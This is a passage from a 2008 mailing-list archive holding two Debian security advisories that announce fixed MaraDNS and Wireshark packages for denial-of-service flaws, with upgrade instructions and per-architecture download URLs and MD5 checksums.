Subject: [Full-disclosure] [SECURITY] [DSA 1445-1] New maradns packages fix denial of service
Message-ID: <20080103211541.GA11434@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1445-1                  security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
January 03, 2008                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : maradns
Vulnerability  : programming error
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-0061

Michael Krieger and Sam Trenholme discovered a programming error in MaraDNS, a simple security-aware Domain Name Service server, which might lead to denial of service through malformed DNS packets.

For the stable distribution (etch), this problem has been fixed in version 1.2.12.04-1etch2.
For the old stable distribution (sarge), this problem has been fixed in version 1.0.27-2.

For the unstable distribution (sid), this problem has been fixed in version 1.2.12.08-1.

We recommend that you upgrade your maradns package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian 3.1 (oldstable)
- ----------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2.dsc
    Size/MD5 checksum: 568 b211f2c8bb6f589b68e470dd3cbb7bf7
  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27.orig.tar.gz
    Size/MD5 checksum: 706012 5fd4a3e8024a0a7561f09e3ff3955cf2
  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2.diff.gz
    Size/MD5 checksum: 13750 5eec451105342d404680363cc55304d4

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_alpha.deb
    Size/MD5 checksum: 334558 e9504463d1aeb92f2a9850f06731d37d

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_amd64.deb
    Size/MD5 checksum: 293844 0ae412e1fc143990be4c10c7c3ef27db

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_arm.deb
    Size/MD5 checksum: 279548 f73c92834aa322530dd7ac8a5b7987b8

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_hppa.deb
    Size/MD5 checksum: 301566 7cd905a3e7c890b691e60acf8a4ad179

i386 architecture (Intel ia32)
  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_i386.deb
    Size/MD5 checksum: 280286 fc8b498709e17b015e6f5d2daa7044ec

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_ia64.deb
    Size/MD5 checksum: 359728 adac044edb5a2062fd7e23f765c2b426

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_m68k.deb
    Size/MD5 checksum: 263496 6b0aca240a56ecd34b41136a07d99723

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_mips.deb
    Size/MD5 checksum: 304440 72a10d56ada559dac2ef3d7d8ef5ba37

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_mipsel.deb
    Size/MD5 checksum: 304524 7c7d31805416f4151e65c554e40bd5d5

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_powerpc.deb
    Size/MD5 checksum: 290008 6be1203722742a5f04543e0b414b5fa1

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_s390.deb
    Size/MD5 checksum: 288736 6d1f00a6dfffef9b48786b5d1f2dda86

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.0.27-2_sparc.deb
    Size/MD5 checksum: 277652 3aed2b89373691601c8e6daa88ea2758

Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2.tar.gz
    Size/MD5 checksum: 1323244 032465dca4842731ab78edb065d0caed
  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2.dsc
    Size/MD5 checksum: 503 024c6dfc89a28dd7113b10eadad124fa

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_alpha.deb
    Size/MD5 checksum: 550836 6fcf2d7f2652c098688d35e40a901b49

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_amd64.deb
    Size/MD5 checksum: 500544 2ca8d84ecc72ace553ab24b99ebb90e9

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_arm.deb
    Size/MD5 checksum: 477186 2b6ba5db9a98ffdc38352d0a1b3cff84

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_hppa.deb
    Size/MD5 checksum: 522826 f6a32d023392e55de5358fb6b98643e4

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_i386.deb
    Size/MD5 checksum: 471410 7083cec7888c69efee3440ce59417dd8

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_ia64.deb
    Size/MD5 checksum: 661664 be8d5c96b8400c17e7624bf754fdd5b4

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_mips.deb
    Size/MD5 checksum: 528270 8eab540505b58fdb2c2f3dc72d284a14

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_mipsel.deb
    Size/MD5 checksum: 529546 b72a7386b2ede6c4cfeb083ae43e5a4e

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_powerpc.deb
    Size/MD5 checksum: 487420 03cc439b6fdfc8dd222aba274ef4d539

s390 architecture (IBM S/390)
  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_s390.deb
    Size/MD5 checksum: 499454 cf0db50276a245147f57a0c556900a56

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/m/maradns/maradns_1.2.12.04-1etch2_sparc.deb
    Size/MD5 checksum: 462932 8d32c8dc463c073a9c5621e6b98ac125

These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHfVBMXm3vHE4uyloRAn+9AJ49C4PONv7sZ2Si6g9+ecFLZgeuyQCgwAld
srllxqwnxFQknzfCQpwGwbo=
=Dd5p
-----END PGP SIGNATURE-----

From jmm at debian.org Thu Jan 3 21:31:39 2008
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Thu, 3 Jan 2008 22:31:39 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1446-1] New wireshark packages fix denial of service
Message-ID: <20080103213139.GA12241@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1446-1                  security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
January 03, 2008                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : wireshark
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2007-6450 CVE-2007-6451

Several remote vulnerabilities have been discovered in the Wireshark network traffic analyzer, which may lead to denial of service.

The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2007-6450

    The RPL dissector could be tricked into an infinite loop.

CVE-2007-6451

    The CIP dissector could be tricked into excessive memory allocation.

For the old stable distribution (sarge), these problems have been fixed in version 0.10.10-2sarge11. (In Sarge Wireshark used to be called Ethereal.)

For the stable distribution (etch), these problems have been fixed in version 0.99.4-5.etch.2.

For the unstable distribution (sid), these problems have been fixed in version 0.99.7-1.

We recommend that you upgrade your wireshark packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian 3.1 (oldstable)
- ----------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.
Source archives:

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10.orig.tar.gz
    Size/MD5 checksum: 7411510 e6b74468412c17bb66cd459bfb61471c
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11.diff.gz
    Size/MD5 checksum: 178746 933cfe01c6bd0906e46c96a7525eaaa9
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11.dsc
    Size/MD5 checksum: 857 0515d93e91a408a93f71604bc53da60e

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_alpha.deb
    Size/MD5 checksum: 5473258 b9210afcc18fdbfdb4792915347fb387
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_alpha.deb
    Size/MD5 checksum: 543376 0251832610b4c2f07bcf915140b24195
  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_alpha.deb
    Size/MD5 checksum: 106622 f0b57252d1c45defdfa375a41cbc57e6
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_alpha.deb
    Size/MD5 checksum: 155400 299e86be216b61506feb73da3176609b

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_amd64.deb
    Size/MD5 checksum: 486626 319742bfc1a65f5088625b5c20662b29
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_amd64.deb
    Size/MD5 checksum: 5334148 2c2fb3aa923bef3803a6030467b6ac39
  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_amd64.deb
    Size/MD5 checksum: 99734 258f8660d8962e18cd957424989d66f1
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_amd64.deb
    Size/MD5 checksum: 154664 fe279aa0fa920e591cd99b5aacb363bf

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_arm.deb
    Size/MD5 checksum: 4684386 322e970b88200331531ba40423ad00b0
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_arm.deb
    Size/MD5 checksum: 473010 621f8e3ee24d6058028093418281e8e2
  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_arm.deb
    Size/MD5 checksum: 96418 31abb070e574a3001595bf35b5163b65
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_arm.deb
    Size/MD5 checksum: 155950 c374875ca4d3545e492e294e71f33b32

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_hppa.deb
    Size/MD5 checksum: 98622 884882d2aa922acde1a92658190eacda
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_hppa.deb
    Size/MD5 checksum: 5787248 7768ca0724d2401156b709720f860ae2
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_hppa.deb
    Size/MD5 checksum: 154680 9d295a56913577c5251bfc7b500ec1c9
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_hppa.deb
    Size/MD5 checksum: 489482 05641d54cb7a2395105e85215713a5dd

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_i386.deb
    Size/MD5 checksum: 91062 223296e9280f5bdd1e352f5e1b32d541
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_i386.deb
    Size/MD5 checksum: 154668 4cabf74d5aa3e316202fc6cc5b1fdab6
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_i386.deb
    Size/MD5 checksum: 443836 0802c65cbd65f6479c695c4f110cdae5
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_i386.deb
    Size/MD5 checksum: 4529566 f7cee09f268308fd2e249e1c0f393aa7

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_ia64.deb
    Size/MD5 checksum: 154668 f8bd4c79877ba95277553142d1b0ac48
  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_ia64.deb
    Size/MD5 checksum: 129324 98a7422c9838a9d866c47866b395bcd2
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_ia64.deb
    Size/MD5 checksum: 674590 be70a50979def7f1b9a39ba4a7a29819
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_ia64.deb
    Size/MD5 checksum: 6630622 31050587e2a5786c6c3d39164e827b32

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_m68k.deb
    Size/MD5 checksum: 447932 03fe7849d127361cc2d5ff6fa4fa3a66
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_m68k.deb
    Size/MD5 checksum: 5570160 33e74413a9258f10697b2d7c768acffc
  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_m68k.deb
    Size/MD5 checksum: 91116 a2f24dfb47f144df4c9c651d899e0316
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_m68k.deb
    Size/MD5 checksum: 154754 bf89b5c4436d95c52ac7ba4669601533

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_mips.deb
    Size/MD5 checksum: 4723264 2795ac4612f87ace234799c1bfca5daf
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_mips.deb
    Size/MD5 checksum: 462960 6947d430b5e9260a218e953b3fd0e2fb
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_mips.deb
    Size/MD5 checksum: 154674 7d3cc285c21b8ee328c623155b08e9d0
  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_mips.deb
    Size/MD5 checksum: 94914 ba091b5f869f1821e3587de4217b9dd8

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_mipsel.deb
    Size/MD5 checksum: 94818 532c3b76afce29da2d50d6508fc8efc7
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_mipsel.deb
    Size/MD5 checksum: 154680 a137ba8649f5b34fc8ee4bd1af246df2
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_mipsel.deb
    Size/MD5 checksum: 458216 54a6c2890e47769b2bf88e96faa5f7df
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_mipsel.deb
    Size/MD5 checksum: 4460936 842eb862a5529c83328ef733223af631

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_powerpc.deb
    Size/MD5 checksum: 94462 b13765526c8304fea6761fddfd646a95
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_powerpc.deb
    Size/MD5 checksum: 455878 444e592e79b53b3c3e8ff6c74a66d41f
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_powerpc.deb
    Size/MD5 checksum: 5068090 8b78b4443614b80d74c5e763538721a1
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_powerpc.deb
    Size/MD5 checksum: 154678 3588fb9f40e66a71c48a7dc86083782c

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_s390.deb
    Size/MD5 checksum: 5621666 1dd4004e6c4c8719aaba8b31390b095d
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_s390.deb
    Size/MD5 checksum: 154662 bcf649ee810da0d4d892e83aeef797fd
  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_s390.deb
    Size/MD5 checksum: 100056 d9bfd2cb2e51411600e1005af43b4539
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_s390.deb
    Size/MD5 checksum: 479816 6b1d615b5e04ba12ad3b4ae7ec8d8cc6

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.10.10-2sarge11_sparc.deb
    Size/MD5 checksum: 5130376 d9ff58d019291252990735cf14601011
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.10.10-2sarge11_sparc.deb
    Size/MD5 checksum: 154684 8f68dc9a336e34723a4d6dd348898d47
  http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.10.10-2sarge11_sparc.deb
    Size/MD5 checksum: 93992 ee25522d8c19209831a8074a164dcef2
  http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.10.10-2sarge11_sparc.deb
    Size/MD5 checksum: 465546 d8f11b286f25e69b796b0473210e3db0

Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4.orig.tar.gz
    Size/MD5 checksum: 13306790 2556a31d0d770dd1990bd67b98bd2f9b
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2.diff.gz
    Size/MD5 checksum: 43214 852f91f8eb38039a7c8765c4bd05f08c
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2.dsc
    Size/MD5 checksum: 1066 d7c8d2ff4d67149f020276757eaee490

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_alpha.deb
    Size/MD5 checksum: 22052 7cb3b1309285b09dccf514e91628df28
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_alpha.deb
    Size/MD5 checksum: 9319798 ba3b4ff7b8f39153c91f86d420b394f7
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_alpha.deb
    Size/MD5 checksum: 181630 66ded130da4b19090a35452d602a1950
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_alpha.deb
    Size/MD5 checksum: 21768 7aa512bedd63f205831228e58bb82897
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_alpha.deb
    Size/MD5 checksum: 117266 68b717382a7a9a8226c5d5d10a77e100
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_alpha.deb
    Size/MD5 checksum: 21772 2f10f5b5badc7a0e169ee22f960f5fb8
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_alpha.deb
    Size/MD5 checksum: 21780 d7622026fe2071fe65752a845d16e72f
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_alpha.deb
    Size/MD5 checksum: 674306 1b0f1ff481f32a6adb3424bec72abfab

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_amd64.deb
    Size/MD5 checksum: 22408 60e4c2647b621acd6024d5f6529dfc37
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_amd64.deb
    Size/MD5 checksum: 22402 6ea544466e1b19fb2e84b5ff60d4b9f3
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_amd64.deb
    Size/MD5 checksum: 181670 07b9285896252f5f630ffca47afecdd9
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_amd64.deb
    Size/MD5 checksum: 112030 23e49501be43ee6bb06c32af66b3c1de
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_amd64.deb
    Size/MD5 checksum: 9119366 96cdc850cbf460b2e611299d91a0b405
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_amd64.deb
    Size/MD5 checksum: 619608 a964d192aa76b6f1a544c0b78125500b
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_amd64.deb
    Size/MD5 checksum: 22744 72b205204f88c564faa0e4b961d35f7e
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_amd64.deb
    Size/MD5 checksum: 22396 8edaed490e0449d414be094232e868ad

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_arm.deb
    Size/MD5 checksum: 181922 ee62ef5c69ec18f7faf452d2c2c54a21
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_arm.deb
    Size/MD5 checksum: 22400 060200580222615ee5a05f6e706b7ad3
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_arm.deb
    Size/MD5 checksum: 22406 36ddaec9510a246830008d738e186f70
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_arm.deb
    Size/MD5 checksum: 107238 f85070e449a327961bb60c35f5d57634
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_arm.deb
    Size/MD5 checksum: 22760 f1ae6a49173592c44d892fcb387a2a96
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_arm.deb
    Size/MD5 checksum: 7739224 51d162e7dc971452a4010812ce0077a9
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_arm.deb
    Size/MD5 checksum: 22416 c5d9d3b28c6ca1c06a318c3a88c9b95e
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_arm.deb
    Size/MD5 checksum: 600466 982b4a3e062cd2ff624649a360881c29

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_hppa.deb
    Size/MD5 checksum: 182544 bc7e9cfba13a84e9fe6a21ae14bd0cd6
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_hppa.deb
    Size/MD5 checksum: 109740 7326c0f7465fde429230e5a1bc3f87dd
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_hppa.deb
    Size/MD5 checksum: 22404 e534361488c208ec2bccccf9f64682c5
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_hppa.deb
    Size/MD5 checksum: 22394 a2633b695eba48836b76b98239b49b68
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_hppa.deb
    Size/MD5 checksum: 22742 4e83ef21c0cd7921bae69226d9de4591
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_hppa.deb
    Size/MD5 checksum: 22402 ff7770c25c495f0d564d93042e010ba5
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_hppa.deb
    Size/MD5 checksum: 634564 b57123d9459ae329cea0db52898b599d
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_hppa.deb
    Size/MD5 checksum: 9855304 2c1d014fa6b674ff33739f250597d9af

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_i386.deb
    Size/MD5 checksum: 22410 0d34d4a3b91993db7f6ffa8832cb80bb
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_i386.deb
    Size/MD5 checksum: 22396 5d01b4fb59d676b81ffe88463734b5f1
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_i386.deb
    Size/MD5 checksum: 182558 2ea2e58b559c438e0dbe3d8eae20526d
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_i386.deb
    Size/MD5 checksum: 7502260 ea5a24b2bbf8bdb0e12d9b522d35d51e
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_i386.deb
    Size/MD5 checksum: 22402 a5e2d7d83467b19149c037612ae43ea0
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_i386.deb
    Size/MD5 checksum: 102208 00c4684ccf895233df30d748368ce386
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_i386.deb
    Size/MD5 checksum: 22752 15a7e72d32c9e2ea6af0f56d44fbdb6d
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_i386.deb
    Size/MD5 checksum: 564614 67bf694c2d06e07308881148e7544175

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_ia64.deb
    Size/MD5 checksum: 22404 6a91b22e9fa38b460f86806b279f74f4
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_ia64.deb
    Size/MD5 checksum: 827484 a0d3df63ed28965c092221815820327b
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_ia64.deb
    Size/MD5 checksum: 22738 92fbe2c822bf2fb40d9bca7dbc56c9c6
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_ia64.deb
    Size/MD5 checksum: 10651058 e14498025cff7520fcf213665b958f01
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_ia64.deb
    Size/MD5 checksum: 145656 2ec77fee2fa37f8ff2b472bb7112a14a
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_ia64.deb
    Size/MD5 checksum: 22392 969b40957504305712c6a4940b6c30ec
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_ia64.deb
    Size/MD5 checksum: 22408 49d75556f5873612d7b664ca6849f22b
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_ia64.deb
    Size/MD5 checksum: 182512 fb73577165992566da0389f86e3a6b95

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_mips.deb
    Size/MD5 checksum: 22738 3ed0461c9e4140c74e2f85ed2a2b2b81
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_mips.deb
    Size/MD5 checksum: 22400 8fa6694347367e82b4e50e39d5733eed
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_mips.deb
    Size/MD5 checksum: 104940 3a7883ff5c784a856c186e77a80622d0
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_mips.deb
    Size/MD5 checksum: 588554 905f9bd3a1b126ffe39e905c7d8ce8c6
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_mips.deb
    Size/MD5 checksum: 22406 3ac0c30337b8bdf65d0b21a000de20a5
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_mips.deb
    Size/MD5 checksum: 8025338 1387b73dfa64200820240f3f9dae7f1d
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_mips.deb
    Size/MD5 checksum: 182552 ee8499efd263c40237edeb8d93a569d6
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_mips.deb
    Size/MD5 checksum: 22390 8faf91bdeb2ec7423f07a725e50d1ad0

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_mipsel.deb
    Size/MD5 checksum: 22394 f5aa29e920753e3bcf0a0674318553d2
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_mipsel.deb
    Size/MD5 checksum: 104444 29bcac5ae36cac54a74694de8395c197
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_mipsel.deb
